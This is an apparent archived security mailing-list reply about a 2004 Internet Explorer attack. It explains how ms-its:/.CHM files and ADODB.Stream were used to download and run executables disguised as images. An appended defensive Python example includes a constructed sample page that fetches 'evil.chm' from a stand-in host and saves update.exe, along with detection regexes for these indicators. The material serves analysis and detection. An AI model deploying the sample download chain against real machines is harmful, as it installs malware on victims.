Message-ID: <40DC2C1A.32449.1138C92@localhost>
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Subject: IE exploit runs code from graphics?
"Larry Seltzer" <larry@...ryseltzer.com> wrote:
> From http://www.eweek.com/article2/0,,1617045,00.asp:
>
> "Analysts at NetSec Inc., a managed security services provider,
> began seeing indications of the compromises early Thursday morning
> and have since seen a large number of identical attacks on their
> customers' networks. The attack uses a novel vector: embedded code
> hidden in graphics on Web pages... NetSec officials said the attack
> seems to exploit a vulnerability in Internet Explorer."
Without having access to any of the information as to what web pages
NetSec thinks are involved, but having seen many recent posts about the
so-called "RFI - Russian IIS Hacks" I'd suggest that both reports are
referring to one and the same, or at least, very closely related,
things.
Common exploits of the ms-its: (etc) protocol download compiled help
files (.CHM) from some web site, causing the HTML code inside the .CHM
to be run in the "My Computer" security zone. Typically (like all but
one of _dozens and dozens_ of these I've seen) the "inner" HTML run
from the .CHM then uses a lightly modified form of one of the common
ADODB.Stream PoC exploits to download yet another file, save it as a
.EXE and run it. Sometimes the file the ADODB exploit code pulls down
will be named with a .GIF or .JPG extension (it can be _any_ extension
the attacker likes as the ADODB.Stream vuln allows the attacker to
specify the target filename and path on the new victim machine _in
full_).
That is hardly the same thing as "embedded code hidden in graphics on
Web pages", but I can easily imagine a naïve journalist getting
confused over such technical issues or a company representative
hankering for some media exposure over-selling the seriousness or
novelty of what they "discovered"...
--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
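The chain described above (an ms-its: reference pulling a .CHM, whose inner HTML uses ADODB.Stream to write a downloaded file to disk, possibly under an image extension) gives a defender two simple things to check: page content for those indicators, and whether a file named .GIF/.JPG actually carries image magic bytes. The following is an added example, not code from the post or from any product it mentions; the sample HTML and filenames are constructed.

```python
import re

# Constructed sample page following the chain the post describes; the host
# and file names are illustrative, not taken from any real incident.
SAMPLE_HTML = """
<html><body>
<object data="ms-its:http://example.invalid/evil.chm::/payload.htm"></object>
<script>
var s = new ActiveXObject("ADODB.Stream");
s.SaveToFile("C:\\\\windows\\\\update.exe", 2);
</script>
</body></html>
"""

# Content indicators a proxy or mail gateway can match (case-insensitive).
INDICATORS = {
    "ms-its_protocol": re.compile(r"(ms-its|mk:@msitstore):", re.I),
    "chm_reference": re.compile(r"\.chm\b", re.I),
    "adodb_stream": re.compile(r"ADODB\.Stream", re.I),
    "adodb_savetofile": re.compile(r"\.SaveToFile\s*\(", re.I),
}

# Leading bytes a genuine file of each image type must begin with.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def scan_html(html):
    """Return the sorted names of all indicators present in an HTML document."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(html))


def extension_mismatch(filename, data):
    """True when a file named as an image does not start with that image type's
    magic bytes (e.g. a Win32 'MZ' executable saved as something.gif).
    Files with extensions not in MAGIC are not judged and return False."""
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext not in MAGIC:
        return False
    return not any(data.startswith(m) for m in MAGIC[ext])


if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
    print(extension_mismatch("photo.gif", b"MZ\x90\x00\x03\x00"))
```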